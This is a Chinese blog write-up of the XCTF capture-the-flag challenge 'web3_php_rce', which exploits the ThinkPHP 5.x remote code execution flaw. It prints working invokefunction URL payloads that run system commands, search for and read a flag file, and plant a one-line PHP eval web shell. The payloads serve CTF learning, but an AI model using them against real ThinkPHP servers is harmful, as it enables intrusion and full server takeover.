【XCTF高手进阶区】web3_php_rce writeup

最新推荐文章于 2024-05-15 09:48:23 发布
最新推荐文章于 2024-05-15 09:48:23 发布
阅读量378 收藏 1
点赞数 1
分类专栏: CTF 文章标签: unctf 安全 ubuntu linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mitchell_Donovan/article/details/112918123
版权

web3_php_rce

原题链接

key:ThinkPHP5远程代码执行漏洞

 

①环境打开后页面长这样式的👇

 

②题目是php_rce,不妨先来了解一下什么是rce👇

知识补充:

1. 什么是rce(远程代码执行漏洞)
远程命令/代码执行漏洞,简称rce漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。

2. 漏洞产生的根本原因
服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令。

页面也说明了是ThinkPHP V5版本,百度得知这个版本的确有远程代码执行漏洞👇

关于ThinkPHP5的rce漏洞预警

可知ThinkPHP 5.0<5.0.23&5.1<5.1.31版本在没有开启强制路由的情况下可能存在远程代码执行漏洞,攻击者通过该漏洞可能完全控制Web服务器

于是乎我们可以利用这个漏洞来解题

 

③执行phpinfo可以查看php的版本👇

?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行成功,拖到底部可以看到ThinkPHP的版本确实是5.0.20(证明出题人没忽悠我们)

 

既然能执行phpinfo,当然也可以执行其他命令

比如这个格式的payload可以执行指定的system命令👇

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)
  • ls查看  ls
  • 上一级  ls ../
  • 根目录下  ls /
  • 打开文件   cat /文件名

先在同级目录下寻找,没找到

逐级查看上级目录,最终看到一个名为flag的文件,打开获得flag

 

当然还有更风骚的解法

构造payload,先查找flag文件👇

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name "flag"

发现flag,cat打开👇

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

 

还可以利用刚刚学过的一句话🐎

构造payload执行file_put_contents上传命令,传个🐎

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=shell.php&vars[1][1]=<?php eval($_REQUEST["shell"]);?>

用蚁剑连接后,在主目录下找到flag

å¨è¿éæå¥å¾çæè¿°

 

 

 

Mitch311
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
web3php,sc0Vu/web3.php
weixin_35759015的博客
03-12 1232
web3.phpA php interface for interacting with the Ethereum blockchain and ecosystem.InstallSet minimum stability to dev"minimum-stability": "dev"Thencomposer require sc0vu/web3.php dev-masterOr you can...
web3.php:用于与以太坊块链和生态系统行交互的php接口。 本机ABI解析和智能合约交互
02-05
web3.php 一个与以太坊块链和生态系统行交互的php接口。 安装 为开发人员设置最低稳定性 "minimum-stability": "dev" 然后 composer require sc0vu/web3.php dev-master 或者您可以在composer.json中添加此行 "sc0vu/web3.php": "dev-master" 用法 新实例 use Web3 \ Web3 ; $ web3 = new Web3 ( 'http://localhost:8545' ); 使用提供者 use Web3 \ Web3 ; use Web3 \ Providers \
web3.php操作以太坊
01-07
web3.php操作以太坊私链的具体代码。php需要使用composer。
探秘Web3.PHP:与以太坊块链的优雅交互
最新发布
gitblog_00028的博客
05-15 290
探秘Web3.PHP:与以太坊块链的优雅交互 项目地址:https://gitcode.com/web3p/web3.php 如果你正在寻找一个方便易用的工具来和以太坊块链行交互,那么Web3.PHP可能正是你需要的。这是一个针对PHP开发者的开源库,它提供了与Ethereum生态系统无缝对接的接口。 1、项目介绍 Web3.PHP是一个强大的PHP库,它允许开发者通过简单的API调用来执行...
ctfshow-web3(伪协议php://input的利用)
Welcome To Myon'Blog !
10-07 1330
这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码。,php执行时会将post内容当作文件内容,从而导致。存在文件包含时直接使用PHP伪协议。,当传入的参数作为文件名打开时,可以。
php web3转账交易查询常用操作教程
weixin_39341981的博客
01-02 1718
下面示例在php 7.3.33版本运行正常测试通过,其他版本请自行测试是否能用。php也可以调用web3相关接口行转账交易,唯一需要注册的就是。
xctf.rar_HTML5自适应
09-19
全屏滚动通过JavaScript和CSS3等技术实现,用户可以点击或触摸屏幕以浏览下一屏内容,同时保持视觉的连贯性。 在HTML5中,`<section>`、`<article>`和`<header>`等语义化标签为构建全屏滚动提供了便利。这些标签...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
XCTF_A_成本管理标准功能培训.pptx
09-25
XCTF_A_成本管理标准功能培训.pptx
php web3操作以太坊
02-22
php 以太坊web3代码工具版本,请放心使用,亲测可用版
PHP和MySQL Web开发
03-31
PHP和MySQL Web开发PHP和MySQL Web开发PHP和MySQL Web开发PHP和MySQL Web开发PHP和MySQL Web开发
web3.php实现块链,以太坊块链使用web3开发自己第一个DApp
weixin_31518415的博客
03-10 1682
摘要: 在学习了最基础的一些以太坊知识以及开发框架搭建完成之后,可以尝试开发自己的第一个DApp,此处使用Truffle开发框架,Remix编译环境,Genache测试客户端,具体操作如下在学习了最基础的一些以太坊知识以及开发框架搭建完成之后,可以尝试开发自己的第一个DApp,此处使用Truffle开发框架,Remix编译环境,Genache测试客户端,具体操作如下。此处参照MetaCoin创建自...
web3.php实现块链,web3.js – 访问块链网络
weixin_30175751的博客
03-10 1651
本文将尝试通过web3.js访问块链网络。我们将读取某个账号的余额。创建web3连接首先启动node:$ node在node控制台中加载Web3.js库:const Web3 = require('web3')接下来,使用Infura URL,创建Web3连接。声明Infura URL变量:const rpcURL = "https://mainnet.infura.io/YOUR_INFURA...
【攻防世界】三 --- php_rce
qq_43168364的博客
12-23 431
题目 — php_rce 一、writeup 主页中提示使用了ThinkPHP V5 在github中搜一下ThinkPHP V5的相关漏洞,可以找到一些 由于我们不知其具体的版本,随便找一个执行一下,这里选择第一个 会显出了root 说明thinkphp的版本可能就是:5.0.22,在选择下面的命令执行paylaod执行 可以执行命令 执行find命令查找flag相关文件 可以在根目录下找到flag文件 使用cat命令可以看到flag 二、知识点 Thinkphp5 的 5.0.22
php块链开发游戏,php开发以太坊块链应用
weixin_36225424的博客
03-10 619
web3.php是一个PHP接口,主要用于与以太坊块链及其生态系统行交互.安装通过Composer来管理依赖关系,首先将minimum-stability设置为dev1"minimum-stability": "dev"然后执行:1composer require sc0vu/web3.php dev-master或者你可以在composer.json中添加这行。1"sc0vu/web3.ph...
tp5 操作web3
weixin_42417351的博客
03-21 3431
composer 引入 composer require kgs/web3 'dev-master' 合约操作 //查询代币余额 $coin_info = [ 'host'=>'节点', 'abi'=>'对应合约abi', 'address'=>'对应合约地址', ]; $web = new Web3($coin_info['host']); $contract = Contract::at($web,$coin_info['abi'],$coin_info['address'])
web3钱包系统开发
a19942438797的博客
11-24 1626
早在2018年,就有人开始谈论web3了,它其实是一个相对概念,通俗意义上可以理解为新一代互联网的简称。Web3相对web1、web2来说的,像移动通信技术3G、4G、5G一样,是高度依赖机器学习、人工智能及块链等技术的下一代互联网技术的统称。
pure_color xctf
07-16
### 回答3: pure_color xctf 是一个CTF(Capture The Flag,夺旗赛)竞赛平台。CTF是一种网络安全竞赛,旨在让参赛者通过解决一系列的密码学、逆向工程、漏洞利用等问题来获取旗标,比赛者可以通过这些旗标来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值